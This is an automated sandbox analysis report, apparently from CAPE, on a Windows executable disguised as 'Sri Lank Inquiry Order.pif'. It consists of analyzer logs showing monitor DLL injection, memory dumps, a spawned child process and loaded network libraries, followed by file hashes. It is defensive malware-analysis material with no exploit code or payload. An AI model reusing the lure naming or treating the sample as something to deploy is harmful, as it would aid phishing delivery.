Analysis

Category: FILE
Package: exe
Started: 2020-06-05 14:05:21
Completed: 2020-06-05 14:12:26
Duration: 425 seconds
Options: route = tor
Log:
2020-05-13 09:25:38,805 [root] INFO: Date set to: 20200605T13:45:11, timeout set to: 200
2020-06-05 13:45:11,062 [root] DEBUG: Starting analyzer from: C:\tmp2ssujfce
2020-06-05 13:45:11,062 [root] DEBUG: Storing results at: C:\ByVGSHdD
2020-06-05 13:45:11,062 [root] DEBUG: Pipe server name: \\.\PIPE\gSsewmPuyG
2020-06-05 13:45:11,062 [root] DEBUG: Python path: C:\Users\Louise\AppData\Local\Programs\Python\Python38-32
2020-06-05 13:45:11,062 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-05 13:45:11,062 [root] INFO: Automatically selected analysis package "exe"
2020-06-05 13:45:11,062 [root] DEBUG: Trying to import analysis package "exe"...
2020-06-05 13:45:11,109 [root] DEBUG: Imported analysis package "exe".
2020-06-05 13:45:11,109 [root] DEBUG: Trying to initialize analysis package "exe"...
2020-06-05 13:45:11,109 [root] DEBUG: Initialized analysis package "exe".
2020-06-05 13:45:11,156 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-06-05 13:45:11,171 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-06-05 13:45:11,187 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-06-05 13:45:11,218 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-06-05 13:45:11,218 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-06-05 13:45:11,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-06-05 13:45:11,281 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-06-05 13:45:11,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-06-05 13:45:11,296 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-06-05 13:45:11,312 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-06-05 13:45:11,312 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-06-05 13:45:11,312 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-06-05 13:45:11,312 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-06-05 13:45:11,328 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-06-05 13:45:11,328 [lib.api.screenshot] DEBUG: Importing 'math'
2020-06-05 13:45:11,328 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-06-05 13:45:12,421 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-06-05 13:45:12,453 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-06-05 13:45:12,500 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-06-05 13:45:12,500 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-06-05 13:45:12,500 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-06-05 13:45:12,500 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-06-05 13:45:12,500 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-06-05 13:45:12,546 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-06-05 13:45:12,546 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-06-05 13:45:12,546 [root] DEBUG: Initialized auxiliary module "Browser".
2020-06-05 13:45:12,546 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-06-05 13:45:12,546 [root] DEBUG: Started auxiliary module Browser
2020-06-05 13:45:12,546 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-06-05 13:45:12,593 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-06-05 13:45:12,593 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-06-05 13:45:12,593 [root] DEBUG: Started auxiliary module Curtain
2020-06-05 13:45:12,593 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-06-05 13:45:12,593 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-06-05 13:45:12,593 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-06-05 13:45:12,609 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-06-05 13:45:13,390 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-06-05 13:45:13,390 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-06-05 13:45:13,390 [root] DEBUG: Started auxiliary module DigiSig
2020-06-05 13:45:13,406 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-06-05 13:45:13,406 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-06-05 13:45:13,406 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-06-05 13:45:13,437 [root] DEBUG: Started auxiliary module Disguise
2020-06-05 13:45:13,437 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-06-05 13:45:13,437 [root] DEBUG: Initialized auxiliary module "Human".
2020-06-05 13:45:13,437 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-06-05 13:45:13,437 [root] DEBUG: Started auxiliary module Human
2020-06-05 13:45:13,437 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-06-05 13:45:13,437 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-06-05 13:45:13,437 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-06-05 13:45:13,437 [root] DEBUG: Started auxiliary module Procmon
2020-06-05 13:45:13,437 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-06-05 13:45:13,437 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-06-05 13:45:13,437 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-06-05 13:45:13,453 [root] DEBUG: Started auxiliary module Screenshots
2020-06-05 13:45:13,453 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-06-05 13:45:13,484 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-06-05 13:45:13,484 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-06-05 13:45:13,484 [root] DEBUG: Started auxiliary module Sysmon
2020-06-05 13:45:13,484 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-06-05 13:45:13,484 [root] DEBUG: Initialized auxiliary module "Usage".
2020-06-05 13:45:13,484 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-06-05 13:45:13,484 [root] DEBUG: Started auxiliary module Usage
2020-06-05 13:45:13,484 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-06-05 13:45:13,484 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-06-05 13:45:13,484 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option
2020-06-05 13:45:13,484 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option
2020-06-05 13:45:13,625 [lib.api.process] INFO: Successfully executed process from path "C:\Users\Louise\AppData\Local\Temp\Sri Lank Inquiry Order.pif" with arguments "" with pid 4740
2020-06-05 13:45:13,625 [lib.api.process] INFO: Monitor config for process 4740: C:\tmp2ssujfce\dll\4740.ini
2020-06-05 13:45:13,640 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:13,734 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:13,750 [root] DEBUG: Loader: Injecting process 4740 (thread 2136) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:13,750 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:13,750 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:13,750 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:13,750 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:13,765 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4740
2020-06-05 13:45:15,765 [lib.api.process] INFO: Successfully resumed process with pid 4740
2020-06-05 13:45:16,265 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 13:45:16,281 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 13:45:16,281 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 13:45:16,281 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 4740 at 0x70390000, image base 0x400000, stack from 0x186000-0x190000
2020-06-05 13:45:16,296 [root] DEBUG: Commandline: C:\Users\Louise\AppData\Local\Temp\"C:\Users\Louise\AppData\Local\Temp\Sri Lank Inquiry Order.pif".
2020-06-05 13:45:16,343 [root] INFO: loaded: b'4740'
2020-06-05 13:45:16,343 [root] INFO: Loaded monitor into process with pid 4740
2020-06-05 13:45:16,359 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,359 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,359 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,359 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:16,375 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xc8 amd local view 0x03AC0000 to global list.
2020-06-05 13:45:16,390 [root] DEBUG: DLL loaded at 0x735B0000: C:\Windows\system32\SXS (0x5f000 bytes).
2020-06-05 13:45:16,453 [root] DEBUG: DLL loaded at 0x70370000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-06-05 13:45:16,500 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x104 amd local view 0x03FA0000 to global list.
2020-06-05 13:45:16,515 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 13:45:16,531 [root] DEBUG: DLL loaded at 0x74400000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 13:45:16,546 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x110 amd local view 0x01CF0000 to global list.
2020-06-05 13:45:16,578 [root] DEBUG: DLL loaded at 0x73590000: C:\Windows\system32\VERSION (0x9000 bytes).
2020-06-05 13:45:16,578 [root] DEBUG: DLL unloaded from 0x00400000.
2020-06-05 13:45:33,203 [root] DEBUG: set_caller_info: Adding region at 0x004C0000 to caller regions list (ntdll::LdrLoadDll).
2020-06-05 13:45:33,218 [root] DEBUG: set_caller_info: Adding region at 0x01D80000 to caller regions list (kernel32::GetSystemTime).
2020-06-05 13:45:33,234 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x1d80000
2020-06-05 13:45:33,234 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x01D80000 size 0x400000.
2020-06-05 13:45:33,234 [root] INFO: ('dump_file', 'C:\\ByVGSHdD\\CAPE\\4740_254855266332506662020', b'9;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?0x01D80000;?', ['4740'], 'CAPE')
2020-06-05 13:45:33,281 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ByVGSHdD\CAPE\4740_254855266332506662020 (size 0x50638)
2020-06-05 13:45:33,281 [root] DEBUG: DumpRegion: Dumped stack region from 0x01D80000, size 0x7f000.
2020-06-05 13:45:33,312 [root] INFO: ('dump_file', 'C:\\ByVGSHdD\\CAPE\\4740_1606944802332506662020', b'9;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?0x004C0000;?', ['4740'], 'CAPE')
2020-06-05 13:45:33,312 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ByVGSHdD\CAPE\4740_1606944802332506662020 (size 0x332f)
2020-06-05 13:45:33,328 [root] DEBUG: DumpRegion: Dumped stack region from 0x004C0000, size 0x8000.
2020-06-05 13:45:36,312 [root] INFO: Announced 32-bit process name: Sri Lank Inquiry Order.pif pid: 4088
2020-06-05 13:45:36,312 [lib.api.process] INFO: Monitor config for process 4088: C:\tmp2ssujfce\dll\4088.ini
2020-06-05 13:45:36,312 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:36,359 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:36,359 [root] DEBUG: Loader: Injecting process 4088 (thread 4936) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,359 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:36,359 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,359 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:36,359 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,375 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4088
2020-06-05 13:45:36,406 [root] INFO: Announced 32-bit process name: Sri Lank Inquiry Order.pif pid: 4088
2020-06-05 13:45:36,406 [lib.api.process] INFO: Monitor config for process 4088: C:\tmp2ssujfce\dll\4088.ini
2020-06-05 13:45:36,406 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:36,437 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:36,437 [root] DEBUG: Loader: Injecting process 4088 (thread 4936) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,437 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:36,453 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,453 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 13:45:36,453 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,468 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4088
2020-06-05 13:45:36,484 [root] INFO: Announced 32-bit process name: Sri Lank Inquiry Order.pif pid: 4088
2020-06-05 13:45:36,484 [lib.api.process] INFO: Monitor config for process 4088: C:\tmp2ssujfce\dll\4088.ini
2020-06-05 13:45:36,484 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:36,515 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:36,515 [root] DEBUG: Loader: Injecting process 4088 (thread 0) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,531 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7EFDE000 Local PEB 0x7EFDD000 Local TEB 0x7EFDE000: The operation completed successfully.
2020-06-05 13:45:36,531 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 4936, handle 0xc4
2020-06-05 13:45:36,531 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:36,531 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014C0)
2020-06-05 13:45:36,531 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,546 [root] DEBUG: InjectDllViaIAT: Memory region at 0x07000000 not empty.
2020-06-05 13:45:36,546 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 13:45:36,546 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,546 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4088
2020-06-05 13:45:36,546 [root] INFO: ('dump_file', 'C:\\ByVGSHdD\\CAPE\\4740_396896202262606662020', b'4;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?4088;?', ['4740'], 'CAPE')
2020-06-05 13:45:36,578 [root] INFO: Announced 32-bit process name: Sri Lank Inquiry Order.pif pid: 4088
2020-06-05 13:45:36,578 [lib.api.process] INFO: Monitor config for process 4088: C:\tmp2ssujfce\dll\4088.ini
2020-06-05 13:45:36,578 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:36,609 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:36,609 [root] DEBUG: Loader: Injecting process 4088 (thread 0) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,609 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7EFDE000 Local PEB 0x7EFDD000 Local TEB 0x7EFDE000: The operation completed successfully.
2020-06-05 13:45:36,609 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 4936, handle 0xc4
2020-06-05 13:45:36,609 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:36,609 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014C0)
2020-06-05 13:45:36,609 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,625 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 13:45:36,625 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,625 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4088
2020-06-05 13:45:36,625 [root] INFO: Announced 32-bit process name: Sri Lank Inquiry Order.pif pid: 4088
2020-06-05 13:45:36,640 [lib.api.process] INFO: Monitor config for process 4088: C:\tmp2ssujfce\dll\4088.ini
2020-06-05 13:45:36,640 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2ssujfce\dll\onPbkgRA.dll, loader C:\tmp2ssujfce\bin\VTJYuNj.exe
2020-06-05 13:45:36,671 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\gSsewmPuyG.
2020-06-05 13:45:36,671 [root] DEBUG: Loader: Injecting process 4088 (thread 4936) with C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,671 [root] DEBUG: Process image base: 0x00400000
2020-06-05 13:45:36,671 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014C0)
2020-06-05 13:45:36,671 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,671 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 13:45:36,671 [root] DEBUG: Successfully injected DLL C:\tmp2ssujfce\dll\onPbkgRA.dll.
2020-06-05 13:45:36,687 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 4088
2020-06-05 13:45:36,703 [root] INFO: ('dump_file', 'C:\\ByVGSHdD\\CAPE\\4740_1821066611262606662020', b'3;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?4088;?', ['4740'], 'CAPE')
2020-06-05 13:45:36,781 [root] INFO: ('dump_file', 'C:\\ByVGSHdD\\CAPE\\4740_942954961262606662020', b'3;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?C:\\Users\\Louise\\AppData\\Local\\Temp\\Sri Lank Inquiry Order.pif;?4088;?', ['4740'], 'CAPE')
2020-06-05 13:45:36,796 [root] WARNING: Unable to open termination event for pid 4740.
2020-06-05 13:45:36,828 [root] INFO: ('dump_file', 'C:\\Users\\Louise\\AppData\\Local\\Temp\\~DFB1B9194643FC134C.TMP', '', False, 'files')
2020-06-05 13:45:36,828 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 13:45:36,843 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 13:45:36,875 [root] INFO: Disabling sleep skipping.
2020-06-05 13:45:36,875 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 13:45:36,875 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 4088 at 0x70390000, image base 0x400000, stack from 0x186000-0x190000
2020-06-05 13:45:39,156 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xc4 amd local view 0x74F40000 to global list.
2020-06-05 13:45:39,171 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\shell32 (0xc4c000 bytes).
2020-06-05 13:45:39,203 [root] DEBUG: DLL loaded at 0x75CC0000: C:\Windows\syswow64\wininet (0x1c4000 bytes).
2020-06-05 13:45:39,203 [root] DEBUG: DLL loaded at 0x76E40000: C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:39,218 [root] DEBUG: DLL loaded at 0x74E90000: C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:39,218 [root] DEBUG: DLL loaded at 0x76EE0000: C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:39,234 [root] DEBUG: DLL loaded at 0x73590000: C:\Windows\system32\version (0x9000 bytes).
2020-06-05 13:45:39,234 [root] DEBUG: DLL loaded at 0x767F0000: C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-06-05 13:45:39,249 [root] DEBUG: DLL loaded at 0x766F0000: C:\Windows\syswow64\normaliz (0x3000 bytes).
2020-06-05 13:45:39,249 [root] DEBUG: DLL loaded at 0x76BA0000: C:\Windows\syswow64\iertutil (0x215000 bytes).
2020-06-05 13:45:39,249 [root] DEBUG: DLL loaded at 0x76EF0000: C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-06-05 13:45:39,296 [root] DEBUG: DLL loaded at 0x73230000: C:\Windows\system32\Secur32 (0x8000 bytes).
2020-06-05 13:45:39,296 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\system32\profapi (0xb000 bytes).
2020-06-05 13:45:39,296 [root] DEBUG: DLL loaded at 0x72DF0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-06-05 13:45:39,343 [root] DEBUG: DLL loaded at 0x76EB0000: C:\Windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-06-05 13:45:39,375 [root] DEBUG: DLL loaded at 0x763F0000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2020-06-05 13:45:39,390 [root] DEBUG: DLL loaded at 0x760B0000: C:\Windows\syswow64\NSI (0x6000 bytes).
2020-06-05 13:45:39,406 [root] DEBUG: DLL loaded at 0x6EA70000: C:\Windows\system32\winhttp (0x58000 bytes).
2020-06-05 13:45:39,421 [root] DEBUG: DLL loaded at 0x6EA20000: C:\Windows\system32\webio (0x50000 bytes).
2020-06-05 13:45:39,421 [root] DEBUG: DLL unloaded from 0x6EA70000.
2020-06-05 13:45:39,437 [root] DEBUG: DLL loaded at 0x74880000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-06-05 13:45:39,468 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-06-05 13:45:39,468 [root] DEBUG: DLL loaded at 0x74490000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-06-05 13:45:39,484 [root] DEBUG: DLL loaded at 0x72DE0000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-06-05 13:45:39,500 [root] DEBUG: DLL loaded at 0x702A0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-06-05 13:45:39,515 [root] DEBUG: DLL loaded at 0x70250000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-06-05 13:45:39,531 [root] DEBUG: DLL loaded at 0x76170000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-06-05 13:45:39,531 [root] DEBUG: DLL loaded at 0x70310000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-06-05 13:45:39,531 [root] DEBUG: DLL loaded at 0x72E10000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-06-05 13:45:39,546 [root] DEBUG: DLL loaded at 0x702D0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2020-06-05 13:45:39,562 [root] DEBUG: DLL loaded at 0x746C0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-06-05 13:45:39,562 [root] DEBUG: DLL loaded at 0x70230000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-06-05 13:45:39,562 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 13:45:39,593 [root] DEBUG: DLL loaded at 0x74400000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 13:45:39,593 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2020-06-05 13:45:39,593 [root] DEBUG: DLL loaded at 0x702B0000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2020-06-05 13:45:39,609 [root] DEBUG: DLL loaded at 0x75B90000: C:\Windows\syswow64\urlmon (0x124000 bytes).
2020-06-05 13:45:39,625 [root] DEBUG: DLL loaded at 0x72E00000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-06-05 13:45:40,328 [root] DEBUG: DLL loaded at 0x6FAE0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2020-06-05 13:45:40,375 [root] DEBUG: DLL loaded at 0x73A10000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\Comctl32 (0x19e000 bytes).
2020-06-05 13:45:40,375 [root] DEBUG: DLL unloaded from 0x746C0000.
2020-06-05 13:45:40,406 [root] DEBUG: DLL unloaded from 0x72DE0000.
2020-06-05 13:45:41,187 [root] DEBUG: CreateThread: Initialising breakpoints for thread 3988.
2020-06-05 13:45:41,187 [root] DEBUG: DLL unloaded from 0x77340000.
2020-06-05 13:45:45,203 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 4088).
2020-06-05 13:45:45,265 [root] DEBUG: ClearAllBreakpoints: Error: no thread id for thread breakpoints 0x220ec28.
2020-06-05 13:48:36,390 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-05 13:48:36,390 [lib.api.process] ERROR: Failed to open terminate event for pid 4740
2020-06-05 13:48:36,390 [root] INFO: Terminate event set for process 4740.
2020-06-05 13:48:36,390 [root] INFO: Created shutdown mutex.
2020-06-05 13:48:37,406 [root] INFO: Shutting down package.
2020-06-05 13:48:37,406 [root] INFO: Stopping auxiliary modules.
2020-06-05 13:48:38,218 [lib.common.results] WARNING: File C:\ByVGSHdD\bin\procmon.xml doesn't exist anymore
2020-06-05 13:48:38,218 [root] INFO: Finishing auxiliary modules.
2020-06-05 13:48:38,218 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-06-05 13:48:38,249 [root] INFO: Uploading files at path "C:\ByVGSHdD\debugger" 
2020-06-05 13:48:38,296 [root] WARNING: Monitor injection attempted but failed for process 4088.
2020-06-05 13:48:38,296 [root] INFO: Analysis completed.

Machine

Name: win7x64_1
Label: win7x64_5
Manager: KVM
Started On: 2020-06-05 14:05:21
Shutdown On: 2020-06-05 14:12:26

File Details

File Name Sri Lank Inquiry Order.pif
File Size 81920 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
PE timestamp 2011-12-12 20:46:08
MD5 3f2fd6c7f2735d8ebba0984ef18f67b0
SHA1 f79d62727a698d8360da2fd4f872f82fe451f419
SHA256 3ccf8c8e41e08d5a8152659ca2cd6348a15c126ca4571129d4a118de63d45f80
